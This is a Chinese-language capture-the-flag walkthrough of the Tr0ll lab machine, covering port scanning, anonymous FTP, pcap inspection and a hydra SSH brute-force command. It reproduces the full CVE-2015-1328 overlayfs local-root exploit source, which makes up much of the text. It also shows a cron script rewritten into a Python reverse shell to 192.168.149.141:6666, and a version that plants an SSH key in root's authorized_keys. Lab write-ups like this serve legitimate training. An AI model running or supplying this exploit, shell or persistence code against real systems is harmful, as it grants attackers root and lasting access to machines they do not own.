Tr0ll

nmap 扫一下端口：
nmap -p- -A 192.168.149.174

image.png

访问一下 80 端口，只有一张图片

image.png

访问了一下 robots.txt 得到了一个 /secret 目录

image.png

去访问一下仍然只有一张图片

image.png

之前 nmap 扫端口的时候，说了可以匿名登录 ftp
以及还有个流量包 lol.pcap

image.png

直接连接上去

image.png

从这个流量包里面拿到了 ftp 的一组用户名和密码 anonymous/password

image.png

还有这样一组信息

image.png

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n
去访问一下目录试试

image.png

这竟然是一个 ELF 文件，执行一下试试

image.png

又得到一个路径 0x0856BF，再去访问一下

image.png

image.png

good_luck 目录中有个 txt，作为用户名
this_folder_contains_the_password 目录中有个 pass.txt
然而这个文件名就是 password

爆破一下 ssh
hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.174 ssh
-L user.txt 指定爆破账号字典为 user.txt
-w 10 设置最大超时时间 10s，默认 30s
-P pass.txt 指定密码字典为 pass.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程

拿到一对：overflow/Pass.txt

image.png

几种提权方法：

overlayfs 本地提权

查看内核版本：uname -a

image.png

直接搜一下提权的脚本

image.png

复制出来 cp /usr/share/exploitdb/exploits/linux/local/37292.c hack.c
在目标机器上复制上，然后编译好 gcc hack.c -o hack

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

./hack 就拿到了 root 权限

image.png

计划任务提权

通过写入 ssh 密钥获得权限

连上之后发现过一段时间就会断开，系统有个计划任务，查找一下日志
cat /var/log/cronlog

发现是一个 cleaner.py 的文件，find 查找一下

image.png

image.png

内容如下

image.png

把他改一下，改成

反弹 shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.149.141",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
#用https://krober.biz/misc/reverse_shell.php生成的

image.png

覆盖 ssh

先在 kali 上生成公钥

image.png

然后查看一下，把这个复制出来

image.png

然后再把那个 cleaner.py 给写为：

#!/usr/bin/env python
import os
import sys
try:
    os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDGfjWcCnu2Mi8Op+LBy3HoDYYAaiOoNhfA9W0TMO6kjCvYhjBp62xzu7tWAbm9+EPGLzZ6AmDG0znEyEVpHFgk5dWOak4VYkDX50FXbRPshgQZY4c9RfbNA3Th7dSuFo8m7rWNbMkqxC5KBnTjkek7d20uI3CBPIdRFmjg8cD03Q62DMaxbuE0tIF5nUK65ubltt5blRlWsSKBiELerk7q6Ru5qUnOIjfmefwzFfgvH7QeRT7bZyttytVcG7PqlKXL/Sh2oEOTcgYJmOqWuKaDJqXiY5/9XVEMm+nF4Y19ytAgHNquDv5RUgAC1+5gNaG/gCtaYRxoZbRy1JcFzM5EQ0RK37kEO6mTm+AzRzwvEew2h+Byci1/jffI5OuqM6QFLnaUq/Kxb2yWf7l6Bwfq+nI1kM7n8YPdGF2jL06V2Teo+yUewnGCDbcvhNXm4ryi66vYJfXmNz668dAISYI/821+i/eRKQO5Sv8Eje2a4Y136etzIwQYWaHpYuhwSQc= root@yichen" >> /root/.ssh/authorized_keys')
except:
    sys.exit()

要记得把 id_rsa 复制到 /root/.ssh/ 这里

image.png

还有很多，但都是用那个脚本配合的
参考：https://blog.csdn.net/weixin_44214107/article/details/100742919